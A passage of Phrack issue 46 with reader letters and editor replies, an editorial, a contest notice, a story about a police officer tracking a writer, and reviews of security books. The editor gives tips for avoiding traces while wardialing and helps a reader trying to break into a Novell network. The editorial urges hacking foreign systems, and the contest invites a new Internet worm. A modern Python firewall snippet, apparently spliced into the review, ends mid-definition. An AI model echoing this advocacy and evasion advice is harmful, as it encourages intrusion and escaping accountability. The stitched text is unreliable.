Aren't we awful fucking high on ourselves? Christ. Mondo & Wired readers and writers (and stars) are themselves so fucking far removed from the real meat of the underground, that they wouldn't even be able to relate to it. Obviously this "documentary" is going to be aimed at the wannabes who sit at home furiously masturbating to "Cyborgasm" while installing FRACTINT, being very careful not to soil their copy of "The Hacker Crackdown." Oh joy.

These guys are so fucking out of it, they sent me two letters. One addressed to Phrack, the other to Phrack / Emmanuel Goldstein. Maybe they think we're 2600.

CYBER-COUNT: 12 occurrences. That's kind of low. I'm surprised your public relations people didn't have you add in a few more cyber-this's or cyber-that's into the blurb. Gotta keep that cyber-count high if you want to get those digi-bucks out of those cyberians! CYBER!!!

Read my review of Cyberia guys...find a new pop-fad to milk for cash.]

------------------------------------------------------------------------------

In less than 3 weeks, I will be leaving for Basic Training. Once out of there, I will be working on Satellite Data Transmissions for the US Army. I am highly excited, just waiting to see what type of computers I will be working on. Anyways, I will be enrolled in a 32-week accelerated technical class teaching me all about satellites, and the computers that I will be using. Here's the kick. I'll be writing a series of Tech Journals detailing the workings/operations of/weaknesses, and the use of the systems. I was wondering if you would be interested in carrying these.
I've read Phrack for a long time, but it is an off the wall subject. I'll also be playing with the military phone system, in hopes of finding out what the ABCD tones do. (I heard from a file that Military phones utilize them but I'm still a civilian, and am clueless).

Thanks for keeping me informed Kalisti!

[Sorry to hear about your impending Basic Training. I'm not big on the military, as they would make me chop off all my hair.

About the Satellite systems: YES If you do indeed find time to write up any files on how they work, systems involved, weaknesses, etc. I'D LOVE TO PRINT THAT! Just make sure you don't blow your clearance. Satellites are very cool. I'm about to buy a Ku Band disk to do some packet radio type stuff. A bit low-tech compared to the Army, but hell, I'm on a budget.

ABCD...they are used for prioritizing calls on AUTOVON. FTS doesn't use them (I think), and they can only be used on certain lines. They are:

A = priority
B = priority override
C = flash
D = flash override

For instance, if you want to make it known that this is an important call, you hit the "a" button before dialing. It establishes a priority-class call, which may cause a light to come on or something as equally attention grabbing at the called party's end. Priority calls cannot be interrupted, except by a "Priority Override" etc, with Flash Override being the highest class.

If you do these from an improper line, you will get an error message. The one I used to get when BS'ing AUTOVON op's long ago was "The President's use of this line is not authorized." Funny.

Let me know if any of this is still valid.]

------------------------------------------------------------------------------

Dear Phrack,

The following is a copy of a Toneloc found file my friend got. As happens to my friend a lot the numbers aren't valid. But, you'll see he found at least one System 75. It appears that the 75 had a tracer installed on it already.
My friend did not get a call back on it, and nothing has been done as far as we know. But, I still wonder -- Is scanning no longer safe?

Castor

[612]

56X-XXXX 22:57:34 03-Apr-94 C CONNECT 1200

Login: b
Password:
INCORRECT LOGIN

Login: c
Password:
INCORRECT LOGIN

56X-XXXX 23:04:12 03-Apr-94 C CONNECT 1200

c
Unknown command error
Ready
d
Unknown command error
Ready
e
Unknown command error
Ready
b
Unknown command error
Ready

56X-XXXX 23:49:19 03-Apr-94 C CONNECT 1200

KEYBOARD LOCKED, WAIT FOR LOGIN
[1;24r [1;1H [0J
Login: b
Password:
INCORRECT LOGIN

56X-XXXX 01:23:28 04-Apr-94 C CONNECT 1200

Login: b
Password:
INCORRECT LOGIN
Call traced to 612-XXX-XXXX.
Saving number in security log for further investigation.

[Jeez. That sure does suck.

Well, live and learn kiddoes. 1994 is not the time to be hacking by direct dialing local numbers. It's just not all that smart.

Caller-ID has been tariffed in a lot of RBOCS. A lot of modem manufacturers implemented caller-id features into their equipment. Having these features in the equipment means that it won't be long before people redesign all their login programs to make use of these features. I would.

I've got an ISDN line. Every time I call out, the SPID (phone number) of the B channel I'm using is broadcast. There is nothing I can do about that. On a remote connection, almost all decent ISDN terminal adaptors have the option to block any SPID they don't know. They won't even answer the phone, because they receive and interpret the phone number before any session is established.

Yeah, well, that's ISDN, but it will not take a genius to do a few quick hacks on some linux box and we will suddenly be inundated with all kinds of "security packages" that use modems with Caller-ID.

Yeah, I know, *67 (or whatever it is) to block the data, or route the call through another carrier so the data won't get passed (10288-NXX-XXXX). The data is still in the system, just not being transmitted from the switch out to the party being called.
It amazes me how many really smart people I know have been busted solely because they were hacking local systems and calling them directly.

Scanning has always been a very tricky subject. Since you are paying for a phone line, and if you have flat-rate service, you are thereby entitled to call as many numbers as you want. The big issue a while back was dialing sequentially (which set some telcos on a rampage because call usage patterns looked like telemarketing machines). The other problem is harassment. One call to an individual is a wrong number. Two is bordering on harassment. So, doing a complete scan and calling the carriers back through some other method would be a fairly good idea. And always have your calls forwarded to a non-working number so the 5,000 assholes who call-return you during the scan won't interfere.

If you are lucky enough to live in the boonies, you are probably still somewhat safe, but everyone else...be careful.]

------------------------------------------------------------------------------

Phrack-

I was wondering if anyone has ever done an article on breaking Novell Network through a workstation. I've heard it can be done through the SysAdmin computer, but is there a way to find the userlist and passwords? Also how would I go about cleaning up after myself so as to not leave a trace on the logs? I would appreciate a way other than screen capture, but if anyone knows of a good boot record booting program to do a capture of every key typed that would be great, and maybe it could be uuencoded in the next Phrack!

Thanks again for making the best, ass kickin', a step above the rest, brain moving, earth shaking, body shivering, fist shaking, totally bitchin', muy excelente, awesome H/P magazine in the whole world! :)

Sincerely,

The Warden

[Thanks for the compliments...

About your question though, I'm not quite sure what you mean. In a NetWare environment there really isn't any userlist and passwords that you can get at.
You can run the syscon utility and look at all the usernames, but not much more. The passwords are stored in what's known as the "bindery." These are 3 files in the sys/system directory called NET$OBJ.SYS, NET$VAL.SYS, and NET$PROP.SYS. If you can pull a password out of those files, I will shit in my hat and eat it.

Beyond that, yes, a key-capture program is definitely the ideal solution for monitoring activity on a PC workstation. There is one in this issue.]

------------------------------------------------------------------------------

Hi,

I've been reading your magazine for a long time now, my eyes light up when I see an advert for a UK BBS with related hacking/phreaking articles or files on it, but when I try to ring them they are usually gone.

I've been searching for ages for BBS's in the UK with these kind of articles on them but I've had no luck, even postings on the USENET had little results. I have had a few boards which are shady but they ask unusual questions about abiding to rules/laws about hacking then they prompt with fake login and registration schemes.

If you have some, could you possibly send or publish a list of shady UK BBS's? I'd be extremely grateful.

Cheers,

Steven

[Steven:

Hell, I don't even know the numbers to any "shady" bulletin boards here in America. The only UK hacker bbs I knew of in recent years was Unauthorised Access, but I'm sure that's the advert you are referring to.

Maybe someone else in the UK knows something decent to call over there. Any takers? ]

------------------------------------------------------------------------------

[THE GRADY FILES]

Many of you may remember the NSA Security Manual we published last issue. That single file generated more press and hype than I'd seen in a long time. It was mentioned in several newspapers, it appeared on television. It was ridiculous. The document is available to anyone who can fill out a FOIA request.

Regardless, people went zany.
At first I couldn't figure out why everyone was so worked up, and then I caught wind of Grady Ward. Grady had posted the document to the net (with all mention of Phrack deleted from it) in several USENET forums alt.politics.org.nsa, talk.politics.crypto and comp.org.eff.talk. Several readers of Phrack were quick to jump up and point out that Grady had obtained it from the magazine (thanks guys!) which he grudgingly admitted. Grady got to be in the spotlight for a while as the Phrack/NSA Handbook thread continued to grow.

In the meantime, Grady was either calling, or giving him the benefit of the doubt, getting called by an awful lot of press. And even more compelling is the way he'd begun pronouncing my impending federal raid on so many newsgroups.

And of course, I don't have time to read any of that USENET crap so I'm oblivious to all of this. Then I got a message from Grady.

[GRADY WRITES]

You might want to get ready for the FBI serving a warrant on you for information about the NSA security employee manual published in Phrack 45; the NSA security people called me about 10 minutes ago to talk about how it got on the net.

I, being very cooperative, gave him your address in Austin.

Grady
707-826-7715

[I REPLY]

Get a grip.

Nothing that was contained in that file could not be obtained through other sources.

[GRADY REPLIES]

Just because you did nothing illegal, doesn't mean that you won't be annoyed by the FBI. Generally they will be very polite however.

Gripping. Now what?

[I REPLY]

Ok,

If someone actually did contact you, what was his name and number? I will forward that to my lawyer.

[GRADY REPLIES]

I have received your mail regarding "Re: NSA"

It will be read immediately when I return.

If you are seeking more information on the Moby lexical databases, please run finger grady@netcom.com for general information or help downloading live samples and a postscript version of our current brochure via anonymous ftp.
Thanks - Grady Ward

-------------------

He never answered my mail.

------------------------------------------------------------------------------

Dear Sir:

Please refrain from sending such material to this address in the future! Since this address has been unsubscribed from the Phrack mailing list, it means that further mailings are undesirable.

I would also wish to remind you that maintaining lists of people's email without consent is quite immoral and devious. How hypocritical of you, who decry all such behavior when it is practiced by corporations or governments.

Thank you.

robbie@mundoe.maths.mu.oz.au

[PHRACK EDITOR ABUSES POWER:

Dear Sir:

Please excuse the mailing. Have you ever heard of a mistake? Have you ever heard of an oversight? Is it really that much of an inconvenience for you to hit the "d" key to remove one small piece of unwanted mail?

This being said, I would also like to invite you to go fuck yourself.

** I guess this guy does not like to get unsolicited mail **]

------------------------------------------------------------------------------

You people really piss me off! You're undermining the fun and enjoyment of the rest of the internet users just for your juvenile games and illegal activities. Do you realize how much better off we'd be if you all just went away and left the Net to honest people like me?

There is no place in today's society for a bunch of maladjusted paranoid psychotics like yourselves. Please do all of us users a favor and go jump in a river.

Kevin Barnes
kebar@netcom.com

[ABUSE OF POWER CONTINUES...WILL ERIKB EVER STOP?

Hey Keith:

Thanks a lot for the letter!

You know, it does my heart good to hear from such kind and caring folks like yourself. It's so fortunate for the Internet that there are people like yourself who take it upon themselves to become martyrs for their causes and express their ideals in such an intelligent manner. It's fascinating to me that you can send such email sight-unseen.
Do you know who you are writing to? Do you even have the slightest idea? What do you hope to accomplish? Do you have any idea?

This particular "maladjusted paranoid psychotic" to whom you have so eloquently addressed is an engineer in the R&D of a Fortune 500 computer company, and that along with outside consulting will net me about six-figures this tax year. I've consulted for telephone companies, governments, aerospace, financial institutions, oil companies (the list goes on...) and quite frankly I don't do anything even remotely illegal. In fact, one recent and quite prominent quote from me was "I only hack for money."

Now, about the silent majority of "honest people" like yourself that you have so self-righteously chosen to represent...

I've been using the net since the early 80's (arpa-days) initially through an rms granted guest account on MIT-OZ. I've continued to work with other Internet Providers to cover the asses of the so-called "honest people" of which you include yourself.

Now, in my view, if it were not for people like us, who consistently expose and pinpoint weaknesses in the operating systems and networking technologies that you use for your "fun and enjoyment" and that I use for MY JOB, you would continue to be at serious risk. But, perhaps ignorance is truly bliss, and if so, then Keith, you are probably one of the happiest people on this fine planet.

Now, per your request, I may just go jump in a river, as the one near my house is quite nice, and it is almost 100 degrees here in Texas. I only ask that you do me one small favor: print out 500 copies of this letter, roll them up into a paper fist, and shove them into any orifice on your person that meets your criteria as deserving.
** I guess this guy doesn't like me...or you **

EDITORIAL ABUSE ENDS]

-----------------------------------------------------------------------------

==Phrack Magazine==

Volume Five, Issue Forty-Six, File 2a of 28

****************************************************************************

Phrack Editorial

If you aren't from America, this editorial really isn't meant for you, so read on with warning, or go on to the next file.

-----------------------------------------------------------------------------

Stupid hackers.

We've got to do something to clean up our image.

We truly are "America's Most Valuable Resource," as ex-CIA spook Robert Steele has said so many times. But if we don't stop screwing over our own countrymen, we will never be looked at as anything more than common gutter trash. Hacking computers for the sole purpose of collecting systems like space-age baseball cards is stupid, pointless and can only lead to a quick trip up the river.

Obviously, no one is going to stop hacking. I've been lucky in that I've found people willing to pay me to hack for them rather than against them, but not everyone can score such a coup. What kind of alternative can the rest of the community have?

Let's say that everyone was given an opportunity to hack without any worry of prosecution with free access to a safe system to hack from, with the only catch being that you could not hack certain systems. Military, government, financial, commercial and university systems would all still be fair game. Every operating system, every application, every network type all open to your curious minds.

Would this be a good alternative? Could you follow a few simple guidelines for the offer of virtually unlimited hacking with no worry of governmental interference?

Where am I going with this?

Right now we are at war. You may not realize it, but we all feel the implications of this war, because it's a war with no allies, and enormous stakes. It's a war of economics.
The very countries that shake our hands over the conference tables of NATO and the United Nations are picking our pockets. Whether it be the blatant theft of American R&D by Japanese firms, or the clandestine and governmentally-sanctioned bugging of Air France first-class seating, or the cloak-and-dagger hacking of the SWIFT network by the German BND's Project Rahab, America is getting fucked.

Every country on the planet is coming at us. Let's face it, we are the leaders in everything. Period. Every important discovery in this century has been by an American or by an American company. Certainly other countries have better profited by our discoveries, but nonetheless, we are the world's think-tank.

So, is it fair that we keep getting shafted by these so-called "allies?" Is it fair that we sit idly by, like some old hound too lazy to scratch at the ticks sucking out our life's blood by the gallon? Hell no.

Let's say that an enterprising group of computer hackers decided to strike back. Using equipment bought legally, using network connections obtained and paid for legally, and making sure that all usage was tracked and paid for, this same group began a systematic attack of foreign computers. Then, upon having gained access, gave any and all information obtained to American corporations and the Federal government.

What laws would be broken? Federal Computer Crime Statutes specifically target so-called "Federal Interest Computers." (ie: banks, telecommunications, military, etc.) Since these attacks would involve foreign systems, those statutes would not apply. If all calls and network connections were promptly paid for, no toll-fraud or other communications related laws would apply.

International law is so muddled that the chances of getting extradited by a country like France for breaking into systems in Paris from Albuquerque is slim at best. Even more slim when factoring in that the information gained was given to the CIA and American corporations.
Every hacking case involving international breakins has been tried and convicted based on other crimes. Although the media may spray headlines like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA," those hackers were tried for breaking into systems within THEIR OWN COUNTRIES...not somewhere else. 8lgm in England got press for hacking world-wide, but got nailed hacking locally. Australia's Realm Hackers: Phoenix, Electron & Nom hacked almost exclusively other countries, but use of AT&T calling cards rather than Australian Telecom got them a charge of defrauding the Australian government. Dutch hacker RGB got huge press hacking a US military site and creating a "dquayle" account, but got nailed while hacking a local university. The list goes on and on.

I asked several people about the workability of my proposal. Most seemed to concur that it was highly unlikely that anyone would have to fear any action by American law enforcement, or of extradition to foreign soil to face charges there. The most likely form of retribution would be eradication by agents of that government. (Can you say, "Hagbard?")

Well, I'm willing to take that chance, but only after I get further information from as many different sources as I can. I'm not looking for anyone to condone these actions, nor to finance them. I'm only interested in any possible legal action that may interfere with my freedom.

I'm drafting a letter that will be sent to as many different people as possible to gather a fully-formed opinion on the possible legal ramifications of such an undertaking. The letter will be sent to the FBI, SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress, Armed Forces, members of local and state police forces, lawyers, professors, security professionals, and anyone else I can think of. Their answers will help fully form my decision, and perhaps if I pass along their answers, will help influence other American hackers.
We must take the offensive, and attack the electronic borders of other countries as vigorously as they attack us, if not more so. This is indeed a war, and America must not lose.

->Erik Bloodaxe...Hacker...American.

---------------------------

Ok, so maybe that was a bit much. But any excuse to hack without fear should be reason enough to exert a bit of Nationalism. I'd much rather be taken out by the French in some covert operation and go out a martyr, than catch AIDS after being raped by the Texas Syndicate in the metal shop of some Federal Prison. Wouldn't you?

                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 3 of 28

                              //   //  /\   //   ====
                             //   //  //\\ //   ====
                            ==== //  //  \\/   ====

                        /\   //  // \\    //  /===   ====
                       //\\ //  //   //  //   \=\   ====
                      //  \\/    \\ //  //   ===/  ====

                                    PART I

------------------------------------------------------------------------------

                          !! NEW PHRACK CONTEST !!

Phrack Magazine is sponsoring a programming contest open to anyone who wishes to enter.

Write the Next Internet Worm! Write the world's best X Windows wardialer! Code something that makes COPS & SATAN look like high school Introduction to Computing assignments. Make the OKI 1150 a scanning, tracking, vampire-phone. Write an NLM! Write a TSR! Write a stupid game! It doesn't matter what you write, or what computer it's for! It only matters that you enter!

Win from the following prizes:

        Computer Hardware & Peripherals
        System Software
        Complete Compiler packages
        CD-ROMS
        T-Shirts
        Magazine Subscriptions
        and MANY MORE!

STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE!

Enter the PHRACK PROGRAMMING CONTEST!

The rules are very simple:

1) All programs must be original works. No submissions of previously copyrighted materials or works prepared by third parties will be judged.

2) All entries must be sent in as source code only. Any programming language is acceptable. Programs must compile and run without any modifications needed by the judges.
If programs are specific to certain platforms, please designate that platform. If special hardware is needed, please specify what hardware is required. If include libraries are needed, they should be submitted in addition to the main program.

3) No virii accepted. An exception may be made for such programs that are developed for operating systems other than AMIGA/Dos, System 7, MS-DOS (or variants), or OS/2. Suitable exceptions could be, but are not limited to, UNIX (any variant), VMS or MVS.

4) Entries may be submitted via email or magnetic media. Email should be directed to phrack@well.com. Tapes, Diskettes or other storage media should be sent to

        Phrack Magazine
        603 W. 13th #1A-278
        Austin, TX 78701

5) Programs will be judged by a panel of judges based on programming skill displayed, originality, usability, user interface, documentation, and creativity.

6) Phrack Magazine will make no claims to the works submitted, and the rights to the software are understood to be retained by the program author. However, by entering, the Author thereby grants Phrack Magazine permission to reprint the program source code in future issues.

7) All Entries must be received by 12-31-94. Prizes to be awarded by 3-1-95.

-------------------------INCLUDE THIS FORM WITH ENTRY-------------------------

Author:
Email Address:
Mailing Address:
Program Name:
Description:
Hardware & Software Platform(s) Developed For:
Special Equipment Needed (modem, ethernet cards, sound cards, etc):
Other Comments:

------------------------------------------------------------------------------

COMPUTER COP PROPHILE
FOLLOW-UP REPORT

LT. WILLIAM BAKER
JEFFERSON COUNTY POLICE

by The Grimmace

In PHRACK 43, I wrote an article on the life and times of a computer cop operating out of the Jefferson County Police Department in Louisville, Kentucky. In the article, I included a transcript of a taped interview with him that I did after socially engineering my way through the cop-bureaucracy in his department.
At the time I thought it was a hell of an idea and a lot of PHRACK readers probably got a good insight into how the "other side" thinks. However, I made the terminal mistake of underestimating the people I was dealing with by a LONG shot and felt that I should write a short follow-up on what has transpired since that article was published in PHRACK 43. A lot of the stuff in the article about Lt. Baker was obtained by an attorney I know who has no reason to be friendly to the cops. He helped me get copies of court transcripts which included tons of information on Baker's training and areas of expertise. Since the article, the attorney has refused to talk to me and, it appears, that he's been identified as the source of assistance in the article and all he will say to me is that "I don't want any more trouble from that guy...forget where you left my phone number." Interesting...no elaboration...hang up. As I recall, the PHRACK 43 issue came out around November 17th. On November 20th, I received a telephone call where I was living at the home of a friend of mine from Lt. Baker who laughingly asked me if I needed any more information for any "future articles". I tried the "I don't know what you're talking about" scam at which time he read to me my full name, date of birth, social security number, employer, license number of my car, and the serial number from a bicycle I just purchased the day before. I figured that he'd run a credit history on me, but when I checked, there had been no inquiries on my accounts for a year. He told me the last 3 jobs I'd held and where I bought my groceries and recited a list of BBSs I was on (two of which under aliases other than The Grimmace). This guy had a way about him that made a chill run up my spine and never once said the first threatening or abusive thing to me. 
I suppose I figured that the cops were all idiots and that I'd never hear anything more about the article and go on to write some more about other computer cops using the same method. I've now decided against it. I got the message...and the message was "You aren't the only one who can hack out information." I'd always expected to get the typical "cop treatment" if I ever got caught doing anything, but I think this was worse. Hell, I never know where the guy's gonna show up next. I've received cryptic messages on the IRC from a variety of accounts and servers all over the country and on various "private" BBSs and got one on my birthday on my Internet account...it traced back to an anonymous server somewhere in the bowels of UCLA. I don't know anyone at UCLA and the internet account I have is an anonymous account actually owned by another friend of mine. I think the point I'm trying to make is that all of us have to be aware of how the cops think in order to protect ourselves and the things we believe in. But...shaking the hornet's nest in order to see what comes out maybe isn't the coolest way to investigate. Like I wrote in my previous article, we've all gotten a big laugh from keystone cops like Foley and Golden, but things may be changing. Local and federal agencies are beginning to cooperate on a regular basis and international agencies are also beginning to join the party. The big push to eradicate child-pornography has led to a number of hackers being caught in the search for the "dirty old men" on the Internet. Baker was the Kentucky cop who was singularly responsible for the bust of the big kiddie-porn FSP site at the University of Birmingham in England back in April and got a lot of press coverage about it. But I had personally never considered that a cop could hack his way into a password-protected FSP site. And why would he care about something happening on the other side of the world? Hackers do it, but not cops...unless the cops are hackers. 
Hmmm...theories anyone?

I don't live in Louisville anymore...not because of Baker, but because of some other problems, but I still look over my shoulder. It would be easier if the guy was a prick, but I'm more paranoid of the friendly good-ole boy than the raving lunatic breaking in our front doors with a sledge hammer. I always thought we were safe because we knew so much more than the people chasing us. I'm not so certain of that anymore.

So that's it. I made the mistakes of 1) probably embarrassing a guy who I thought would never be able to touch me and 2), drawing attention to myself. A hacker's primary protection lies in his anonymity...those who live the high profiles are the ones who take the falls and, although I haven't fallen yet, I keep having the feeling that I'm standing on the edge and that I know the guy sneaking up behind me.

From the shadows--

The Grimmace
[HsL - RAt - UQQ]

------------------------------------------------------------------------------

                            !! PHRACK READS !!

"Cyberia" by Douglas Rushkoff
Review by Erik Bloodaxe

Imagine a book about drugs written by someone who never inhaled. Imagine a book about raves written by someone who saw a flyer once. Imagine a book about computers by someone who thinks a macintosh is complex. Imagine an author trying to make a quick buck by writing about something his publisher said was hot and would sell. And there you have Cyberia, by Douglas Rushkoff.

I have got to hand it to this amazing huckster Rushkoff, though. By publishing Cyberia, and simultaneously putting out "The Gen X Reader," (which by the way is unequaled in its insipidness), he has covered all bases for the idiot masses to devour at the local bookseller.

Rushkoff has taken it upon himself to coin new terms such as "Cyberia," the electronic world we live in; "Cyberians," the people who live and play online; etc... Like we needed more buzzwords to add to a world full of "Infobahns" "console cowboys," and "phrackers."
Pardon me while I puke.

The "interviews" with various denizens of Rushkoff's "Cyberia" come off as fake as if I were to attempt to publish an interview with Mao Tse Tung in the next issue of Phrack.

We've got ravers talking on and on about "E" and having deep conversations about smart drugs and quantum physics. Let's see: in the dozens of raves I've been to in several states the deepest conversation that popped up was "uh, do you have any more of that acid?" and "this mix is cool." And these conversations were from the more eloquent of the nearly all under 21 crowd that the events attracted. Far from quantum physicians. And beyond that, it's been "ecstasy" or "X" in every drug culture I've wandered through since I walked up the bar of Maggie Mae's on Austin, Texas' 6th Street in the early 80's with my fake id and bought a pouch of the magic elixir over the counter from the bartender (complete with printed instructions). NOT "E." But that's just nit-picking.

Now we have the psychedelic crowd. Listening to the "Interviews" of these jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko. "Some individuals who have smoked Mary Jane, or Reefer oftimes turn to harder drugs such as LSD." That's not a quote from the book, but it may as well be. People constantly talk about "LSD-this" and "LSD-that." Hell, if someone walked into a room and went on about how he enjoyed his last "LSD experience" the way these people do, you'd think they were really really stupid, or just a cop. "Why no, we've never had any of that acid stuff. Is it like LSD?" Please.

Then there are the DMT fruitcakes. Boys and girls, DMT isn't being sold on the street corner in Boise. In fact, I think it would be easier for most people to get a portable rocket launcher than DMT. Nevertheless, in every fucking piece of tripe published about the "new psychedlicia" DMT is splattered all over it.
Just because Terence Fucking McKenna saw little pod people, does not mean it serves any high position in the online community.

And Hackers? Oh fuck me gently with a chainsaw, Douglas. From Craig Neidorf's hacker Epiphany while playing Adventure on his Atari VCS to Gail Thackeray's tearful midnight phonecall to Rushkoff when Phiber Optik was raided for the 3rd time. PLEASE! I'm sure Gail was up to her eyebrows in bourbon, wearing a party hat and prank calling hackers saying "You're next, my little pretty!" Not looking for 3rd-rate schlock journalists to whine to.

The Smart Drink Girl? The Mondo House? Gee...how Cyber. Thanks, but no thanks.

I honestly don't know if Rushkoff really experienced any of this nonsense, or if he actually stumbled on a few DMT crystals and smoked this reality. Let's just say, I think Mr. Rushkoff was absent the day his professor discussed "Creative License in Journalism" and just decided to wing it.

Actually, maybe San Francisco really is like this. But NOWHERE else on the planet can relate. And shit, if I wanted to read a GOOD San Francisco book, I'd reread Armistead Maupin's "Tales of the City." This book should have been called "Everything I Needed to Know About Cyber-Culture I Learned in Mondo-2000."

Seriously...anyone who reads this book and finds anything remotely close to the reality of the various scenes it weakly attempts to cover needs to email me immediately. I have wiped my ass with better pulp.

------------------------------------------------------------------------------

BOOK REVIEW: INFORMATION WARFARE
CHAOS ON THE ELECTRONIC SUPERHIGHWAY
By Winn Schwartau

INFORMATION WARFARE - CHAOS ON THE ELECTRONIC SUPERHIGHWAY
By Winn Schwartau. (C)opyright 1994 by the author
Thunder's Mouth Press, 632 Broadway / 7th floor / New York, NY 10012
ISBN 1-56025-080-1 - Price $22.95
Distributed by Publishers Group West, 4065 Hollis St.
/ Emeryville, CA 94608
(800) 788-3123

Review by Scott Davis (dfox@fennec.com)
(from tjoauc1-4 ftp: freeside.com /pub/tjoauc)

If you only buy one book this year, make sure it is INFORMATION WARFARE! In my 10+ years of existing in cyberspace and seeing people and organizations debate, argue and contemplate security issues, laws, personal privacy, and solutions to all of these issues...and more, never have I seen a more definitive publication. In INFORMATION WARFARE, Winn Schwartau simply draws the line on the debating. The information in this book is hard-core, factual documentation that leaves no doubt in this reader's mind that the world is in for a long, hard ride in regards to computer security. The United States is open to the world's electronic terrorists. When you finish reading this book, you will find out just how open we are.

Mr. Schwartau talks about industrial espionage, hacking, viruses, eavesdropping, code-breaking, personal privacy, HERF guns, EMP/T bombs, magnetic weaponry, and the newest phrase of our generation... "Binary Schizophrenia". He exposes these topics from all angles. If you spend any amount of time in Cyberspace, this book is for you.

How much do you depend on technology?

ATM machines, credit cards, toasters, VCR's, televisions, computers, telephones, modems...the list goes on. You use technology and computers and don't even know it! But the point is...just how safe are you from invasion? How safe are our country's secrets? The fact is - they are NOT SAFE! How easy is it for someone you don't know to track your every move on a daily basis? VERY EASY! Are you a potential victim to fraud, breach of privacy, or general infractions against the way you carry on your daily activities? YES! ...and you'd never guess how vulnerable we all are!

This book will take you deep into places the government refuses to acknowledge. You should know about INFORMATION WARFARE. Order your copy today, or pick it up at your favorite book store.
You will not regret it.

------------------------------------------------------------------------------

_Firewalls and Internet Security: Repelling the Wily Hacker_

William R. Cheswick
Steven M. Bellovin

Addison-Wesley, ISBN 0-201-63357-4
306 + XIV = 320 pages
(Printed on recycled paper)

A-Somewhat-Less-Enthusiastic-Review

Reviewed by Herd Beast

The back of this book claims that, "_Firewalls and Internet Security_ gives you invaluable advice and practical tools for protecting your organization's computers from the very real threat of hacker attacks." That is true. The authors also add something from their knowledge of these hacker attacks. The book can be roughly separated into two parts: Firewalls, and, you guessed it: Internet Security. That is how I see it. The book itself is divided into four parts (Getting Started, Building Your Own Firewall, A Look Back & Odds and Ends), three appendixes, a bibliography, a list of 42 bombs and an index.

The book starts with overall explanations and an overview of the TCP/IP protocol. More than an overview of the actual TCP/IP protocol, it is a review of services often used with that protocol, and the security risks they pose. In that chapter the authors define "bombs" -- as particularly serious security risks. Despite that fact, and the tempting bomb list in the end, this book is not a guide for someone with passing knowledge of Internet security who wants to learn more explicit details about holes. It is, in the authors' words, "not a book on how to administer a system in a secure fashion."

FIREWALLS (Including the TCP/IP overview: pages 19-131)

What is a firewall and how is it built?(*) If you don't know that, then definitely get this book. The Firewalls chapter is excellent even for someone with a passing knowledge of firewalls or general knowledge of what they set out to accomplish. You might still learn more.

In the Firewalls chapter, the authors explain the firewall philosophy and types of firewalls.
Packet-filtering gateways rely on rule-based packet filtering to protect the gateway from various types of attacks. You can filter everything and achieve the same effect of disconnecting from the Internet, you can filter everything from misbehaving sites, you can allow only mail in, and so on. An application-level gateway relies on the applications set on the firewall. Rather than let a router filter traffic based on rules, one can strip a machine clean and only run desired services -- and even then, more secure versions of those services can be run. Circuit-level gateways relay data between the gateway and other networks. The relay programs copy data from inside the firewall to the outside, and log their activity. Most firewalls on the Internet are a combination of these gateways.

Next, the authors explain how to build an application-level gateway based on the work they have done with the research.att.com gateways. As mentioned, this chapter is indeed very good. They go over setting up the firewall machines, router configuration for basic packet filtering (such as not allowing Internet packets that appear to come from inside your network). They show, using the software on the AT&T gateway as example, the general outline of proxies and give some useful advice. That chapter is very interesting; reading it with Bill Cheswick's (older) paper, "The Design of a Secure Internet Gateway" makes it even better. The examples given, like the NFS and X proxies run on the gateway, are also interesting by themselves.

INTERNET SECURITY (pages 133-237)

Internet security is a misleading name. This part might also be called "Everything else." Most of it is a review of hacker attacks logged by AT&T's gateway probes, and of their experience with a hacker.
But there is also a chapter dedicated to computer crime and the law -- computer crime statutes, log files as evidence, the legalities of monitoring intruders and letting them keep their access after finding them, and the ethics of many actions performed on the Internet; plus an introduction to cryptography under Secure Communication over Insecure Networks. The later sections are good. The explanation of several encryption methods and short reviews of applications putting them to use (PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the computer crime sections are also good -- although I'm not a lawyer and therefore cannot really comment on it, and notes that look like "5 USC 552a(b)(c)(10)" cause me to shudder. It's interesting to note that some administrative functions as presented in this book, what the authors call counter-intelligence (reverse fingers and rusers) and booby traps and fake password file are open for ethical debate. Perhaps they are not illegal, but counter-intelligence can surely ring the warning bells on the site being counter-fingered if that site itself is security aware. That said, let's move to hackers. I refer to these as "hacker studies", or whatever, for lack of a better name. This is Part III (A Look Back), which contains the methods of attacks (social engineering, stealing passwords, etc), the Berferd incident (more on that later), and an analysis (statistical and otherwise) of the Bell Labs gateway logs. Back to where we started, there is nothing new or innovative about these chapters. The Berferd hacker case is not new, it is mostly just uninteresting. The chapter is mostly a copy (they do state this) of Bill Cheswick's paper titled "A Night with Berferd, in Which a Cracker is Lured, Endured and Studied." The chapter concerning probes and door-knob twisting on the Internet (Traps, Lures, and Honey Pots) is mostly a copy (they do not state this) of Steven Bellovin's paper titled, "There Be Dragons". 
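
Added example (not from the book, the review, or AT&T's gateway): the router rule mentioned in the Firewalls part above, dropping Internet packets that claim an inside source address, written as a first-match packet filter that also lets "only mail in". The addresses, interface names and rule names are constructed for illustration; the filter is stateless and default-deny.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional, Sequence, Tuple

# Constructed addressing (RFC 5737 documentation ranges), not from the book.
INSIDE = ipaddress.ip_network("192.0.2.0/24")
MAIL_GW = ipaddress.ip_network("192.0.2.25/32")


@dataclass(frozen=True)
class Packet:
    iface: str                  # interface the packet arrived on: "outside" or "inside"
    src: str
    dst: str
    proto: str
    dport: Optional[int] = None


@dataclass(frozen=True)
class Rule:
    name: str
    action: str                 # "permit" or "deny"
    iface: Optional[str] = None
    src: Optional[ipaddress.IPv4Network] = None
    dst: Optional[ipaddress.IPv4Network] = None
    proto: Optional[str] = None
    dport: Optional[int] = None

    def matches(self, pkt: Packet, src, dst) -> bool:
        """A field left as None is a wildcard; every field that is set must match."""
        return (
            (self.iface is None or self.iface == pkt.iface)
            and (self.src is None or src in self.src)
            and (self.dst is None or dst in self.dst)
            and (self.proto is None or self.proto == pkt.proto)
            and (self.dport is None or self.dport == pkt.dport)
        )


# An inside source address arriving on the outside interface can only be forged.
ANTI_SPOOF = Rule("anti-spoof", "deny", iface="outside", src=INSIDE)
# "Allow only mail in": SMTP to the mail gateway and nothing else from outside.
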